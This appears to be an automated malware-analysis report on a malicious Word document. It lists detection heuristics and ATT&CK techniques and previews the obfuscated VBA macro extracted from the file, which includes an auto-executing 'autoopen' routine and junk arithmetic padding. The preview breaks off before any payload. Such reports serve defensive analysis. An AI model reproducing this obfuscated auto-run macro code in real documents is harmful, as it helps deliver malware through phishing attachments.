MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is identified as malicious by ClamAV and contains critical heuristics indicating the presence of an auto-executing VBA macro (autoopen) that uses GetObject for execution. The VBA script itself is heavily obfuscated, but the presence of auto-execution and the GetObject call strongly suggest it's designed to download and run a secondary payload. The file type and macro presence point to a spearphishing attachment delivery method.
Heuristics 7
-
ClamAV: Doc.Malware.Obfuse-6895490-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Obfuse-6895490-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 61070 bytes |
SHA-256: bd8e97c4db1a606ea9ad55bdd8cce74abe02342c1ba5d6425dc72b9db3dbbe6e |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "wACAZQA"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function AUwABDAB()
If sAAAAZ = EAUAAAAA Then
Y_4AQZ = 147585807 * V__AAA
fBwADcU = OUwABw - 191099252 + 720052062 + iAAQZUAA * 224499640 / 634110451 + 599572848 / Chr(373981189 / CSng(699200989 + Round(bAA_UZo))) + 317857447 * Log(WDABwA) - 324874379 - 288055138 + jQDUUAU_ * CLng(uxoo1AAA - Atn(kZBBDA / 344702189 / 674772443 + ODAQAAD))
dQUwQA = 404253969 * OABAAc
End If
If nAAZDX = cZAwDA Then
ooAAZA = 516118619 * AAAo_BDA
GwABADoQ = PDU44AG_ - 555871491 + 615251656 + C4D1DA * 70916384 / 912503681 + 362294089 / Chr(762957610 / CSng(706948175 + Round(sC1AB41))) + 591935835 * Log(wXQ1AAA) - 888979072 - 48021418 + JXXocAGx * CLng(TBXADDB - Atn(WAAAAD / 537719910 / 165014765 + XoGoQG))
nBA4BU = 50272901 * SQAQAAx
End If
If nAoA4w = tADABAG Then
oQAoAQw4 = 556823467 * MQZAAAA
NAoDwB = W_ZUCAA - 679625556 + 70816905 + wGGxwA * 351866244 / 73364913 + 263659933 / Chr(720751293 / CSng(391946416 + Round(mw_kAA))) + 657384064 * Log(qXDZx1) - 536852450 - 441663984 + wACA44 * CLng(tZDGAD_ - Atn(oAQ1BZQB / 485352911 / 944848086 + CQAQX_DA))
b1XQABkk = 17096040 * iQQXADA
End If
If LAUAQAA = sABAQZ Then
NUAAAU = 997873575 * QBZQAAA
OAx41_4 = dUc_BZAA - 953199858 + 141405588 + vUcACo * 471053551 / 648328735 + 133422300 / Chr(409706559 / CSng(781855739 + Round(KAxGUc))) + 736006275 * Log(WAUBcc4U) - 954979538 - 919207275 + SBAAD4k * CLng(HAXADBAG - Atn(aQAAAQ / 83593748 / 884021611 + m_oAGB))
LAU4DA1A = 195819998 * VGUUAwQ
End If
If NCCAAA = iACBAA Then
jQDAAA = 865032894 * k4kDxcB
dAxCDcA = ioAGAA4_ - 670020160 + 476173468 + aDGACA * 83734863 / 835388103 + 633579503 / Chr(159824820 / CSng(393708227 + Round(DBAAUDQ))) + 1683046 * Log(UkxAUQ) - 574456162 - 316210274 + GAAAXkG * CLng(KZZDxA - Atn(kCD4w4 / 899100121 / 292967545 + DUAAB1_Q))
wQBUAA = 705066765 * nxcB_oDc
End If
If FUBBx1 = XBxAAZUD Then
cAAAAwwD = 932187187 * K4ADAZ
MZXAAU = w1_CBACA - 161652241 + 618272627 + jAADD_ * 243289908 / 958388756 + 676852848 / Chr(52941582 / CSng(179090625 + Round(PXwDcZk))) + 525389329 * Log(p_xUDG) - 164536416 - 936656633 + B_A4BA * CLng(dDAD_4B - Atn(qAkXAXDk / 883649650 / 86772452 + PZkDAA))
jZGAGCD = 346107645 * VBkADQ
End If
If XBACAC1A = loAkAA Then
vQAkoAA = 159908783 * qkUDZCw
MCAAUk = UABUDU - 961575291 + 216251274 + QUXXZQA * 830996051 / 863944843 + 452465835 / Chr(618750096 / CSng(387760673 + Round(bA_AXQAx))) + 840377929 * Log(AAD_UAo) - 930324173 - 597946304 + zA_CCBAB * CLng(SCoUAQ - Atn(QABBo__U / 354552377 / 461194431 + XXcAGUCA))
lAXAGDw = 759059934 * sk14BD
End If
If SU4ZUQ = dkAA4x Then
iwAQAAD = 871690813 * qAAUG14Q
jAcQQwAx = AAQCAAX - 875136749 + 882277440 + mAQcDAX * 424339926 / 438391795 + 44480239 / Chr(856342606 / CSng(574474964 + Round(MwAwDAAo))) + 394970138 * Log(UZAADUoA) - 518812154 - 955537957 + p_UA4B4 * CLng(MkDAkAA - Atn(sAUwGA / 111541506 / 789912481 + wQxowQA))
NAAQGAAU = 959133475 * DDkZDCAB
End If
End Function
Sub autoopen()
On Error Resume Next
If RCCAQC1 = iAACCA Then
hk_UQU = 431779963 * jBA_AAAX
OAUQAU = aA1AAAx - 494703943 + 674859779 + oQQAoAAD * 615253415 / 540753567 + 708066368 / Chr(990190702 / CSng(741551101 + Round(qAAAAxD))) + 949644567 * Log(jCU1_QA) - 96326171 - 532684623 + m1QQ4AB * CLng(NQAoAXAA - Atn(kB4_A1x / 76568313 / 163906112 + uwGADQA))
iwAkUDAQ = 958926856 * lcoQDk
End If
If NAAAUZ = BAAA1Ax Then
Tco4AUUQ = 917030532 * bAAUBA
WAUAXQ = wDoAABA - 400846237 + 359002928 + GXAB_A1 * 919054904 / 296367878 + 792332386 / Chr(200877891 / CSng(418426193 + Round(nCAGAGDw))) + 124232417
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.